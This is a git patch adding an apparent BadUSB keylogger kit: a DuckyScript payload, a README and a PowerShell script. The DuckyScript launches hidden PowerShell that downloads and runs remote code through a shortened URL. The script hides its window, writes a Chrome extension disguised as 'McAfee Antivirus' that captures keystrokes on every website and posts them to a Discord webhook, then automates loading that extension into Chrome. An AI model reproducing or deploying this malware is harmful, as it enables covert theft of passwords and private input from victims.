From a99aa684d7240e0bdd801769b4b59eeb530046d2 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Sun, 7 Jan 2024 16:26:12 +0000 Subject: [PATCH] Add files via upload --- .../Chrome-Browser-Keylogger.txt | 19 ++ Chrome-Extension-Keylogger/README.md | 11 ++ Chrome-Extension-Keylogger/main.ps1 | 165 ++++++++++++++++++ 3 files changed, 195 insertions(+) create mode 100644 Chrome-Extension-Keylogger/Chrome-Browser-Keylogger.txt create mode 100644 Chrome-Extension-Keylogger/README.md create mode 100644 Chrome-Extension-Keylogger/main.ps1 diff --git a/Chrome-Extension-Keylogger/Chrome-Browser-Keylogger.txt b/Chrome-Extension-Keylogger/Chrome-Browser-Keylogger.txt new file mode 100644 index 0000000..55af5e1 --- /dev/null +++ b/Chrome-Extension-Keylogger/Chrome-Browser-Keylogger.txt @@ -0,0 +1,19 @@ +REM Title: Keylogger To WebHook - Chrome Extension +REM Author: @beigeworm +REM Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs. +REM Target: Windows 10 +REM Credit: Jakov +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_kl_to_dc | iex +ENTER + +https://github.com/beigeworm/BadUSB-Files-For-FlipperZero/blob/main/Chrome-Extension-Keylogger/main.ps1 \ No newline at end of file diff --git a/Chrome-Extension-Keylogger/README.md b/Chrome-Extension-Keylogger/README.md new file mode 100644 index 0000000..7080839 --- /dev/null +++ b/Chrome-Extension-Keylogger/README.md @@ -0,0 +1,11 @@ +

Keylogger To WebHook - Chrome Extension

+ +SYNOPSIS +Creates the neccessary files for a chrome extension that logs all keystrokes on any website. +Then sends the collected keys to a discord webhook. + +USAGE +1. Replace $dc with your webhook. (if $dc is not defined in badUSB script or other.) +2. run the script. +3. test by going to a website in chrome browser (eg. google.com) and type some keys +4. Wait 30 seconds and check webhook for results. diff --git a/Chrome-Extension-Keylogger/main.ps1 b/Chrome-Extension-Keylogger/main.ps1 new file mode 100644 index 0000000..b8d3470 --- /dev/null +++ b/Chrome-Extension-Keylogger/main.ps1 @@ -0,0 +1,165 @@ +$hookurl = "$dc" # YOUR_WEBHOOK_HERE + +# Hide the console +$Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' +$Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru +$hwnd = (Get-Process -PID $pid).MainWindowHandle + +if ($hwnd -ne [System.IntPtr]::Zero) { + $Type::ShowWindowAsync($hwnd, 0) +} +else { + $Host.UI.RawUI.WindowTitle = 'hideme' + $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) + $hwnd = $Proc.MainWindowHandle + $Type::ShowWindowAsync($hwnd, 0) +} + +# Webhook shortened URL handler +$hookurl = (irm $hookurl).url + +# Create the extension file +$DirPath = "C:\Users\Public\Chrome" +New-Item -ItemType Directory -Path $DirPath + +# Create the Main Javascript file (main.js) +$mainjs = @' +let keys = ""; +const current = document.URL; +document.addEventListener("keydown", (event) => { + const key = event.key; + if (key === "Enter") { + keys += "\n"; + return; + } + if (key === "Backspace") { + keys = keys.slice(0, keys.length - 1); + return; + } + if (key === "CapsLock" || key === "Shift") { + return; + } + if (key === "Control") { + keys += "[Ctrl]"; + return; + } + // Arrows + if (key === "ArrowLeft") { + keys += "[LeftArrow]"; + return; + } + if (key === "ArrowRight") { + keys += "[RightArrow]"; + return; + } + if (key === "ArrowDown") { + keys += "[DownArrow]"; + return; + } + if (key === "ArrowUp") { + keys += "[UpArrow]"; + return; + } + // End arrows + keys += key; + saveKeysLocal(); +}); + +window.setInterval(async () => { + keys = getKeysLocal(); + if (keys == "") { + return; + } + const message = `<${current}>\nLogged Keystrokes: ` + "```" + keys + "```"; + sendMessageToDiscord(discordWebhook, message); + keys = ""; + saveKeysLocal(); +}, 20000); // time in milliseconds + +async function sendMessageToDiscord(webhook, msg) { + await fetch(webhook, { + method: "POST", + headers: { + "Content-Type": "application/json", + }, + body: JSON.stringify({ + content: msg, + }), + }); +} + +function saveKeysLocal() { + localStorage.setItem("keys", keys); +} + +function getKeysLocal() { + return localStorage.getItem("keys"); +} +'@ +$mainjs | Out-File -FilePath "$DirPath/main.js" -Encoding utf8 -Force + +# Create the service worker (background.js) +$backgroundjs = @' +chrome.runtime.onMessage.addListener( + function (request, sender, sendResponse) { + sendResponse(request); + } +); +'@ +$backgroundjs | Out-File -FilePath "$DirPath/background.js" -Encoding utf8 -Force + +# Crwate the manifest file (manifest.json) +$manifest = @' +{ + "name": "McAfee Antivirus", + "description": "Antivirus chrome extension made by McAfee. Browse securely on the internet!", + "version": "2.2", + "manifest_version": 3, + "background": { + "service_worker": "background.js" + }, + "content_scripts": [ + { + "matches": [ + "*://*/*" + ], + "js": [ + "Webhook.js", + "main.js" + ] + } + ] +} +'@ +$manifest | Out-File -FilePath "$DirPath/manifest.json" -Encoding utf8 -Force + +#create the webhook file +"const discordWebhook = `"$hookurl`";" | Out-File -FilePath "C:\Users\Public\Chrome\Webhook.js" -Encoding utf8 -Force + +# Send keys to manually open chrome and add extension +$wshell = New-Object -ComObject wscript.shell +Start-Process chrome.exe example.com +sleep 3 +$wshell.AppActivate("chrome.exe") +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys("chrome://extensions/") ;sleep -m 100 +$wshell.SendKeys("{ENTER}") ;sleep 2 +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys(" ") ;sleep 1 +$wshell.SendKeys("{TAB}") ;sleep -m 100 +$wshell.SendKeys("{ENTER}") ;sleep 1 +$wshell.SendKeys("C:\Users\Public\Chrome");sleep -m 100 +$wshell.SendKeys("{ENTER}") ;sleep -m 200 +$wshell.SendKeys("{BACKSPACE}") ;sleep -m 100 +$wshell.SendKeys("{ENTER}") + +# Kill Chrome process +sleep 3 +$wshell.SendKeys("%{F4}") + +<# +Add-Type -AssemblyName System.Windows.Forms +[System.Windows.Forms.SendKeys]::SendWait('%{F4}') +#> \ No newline at end of file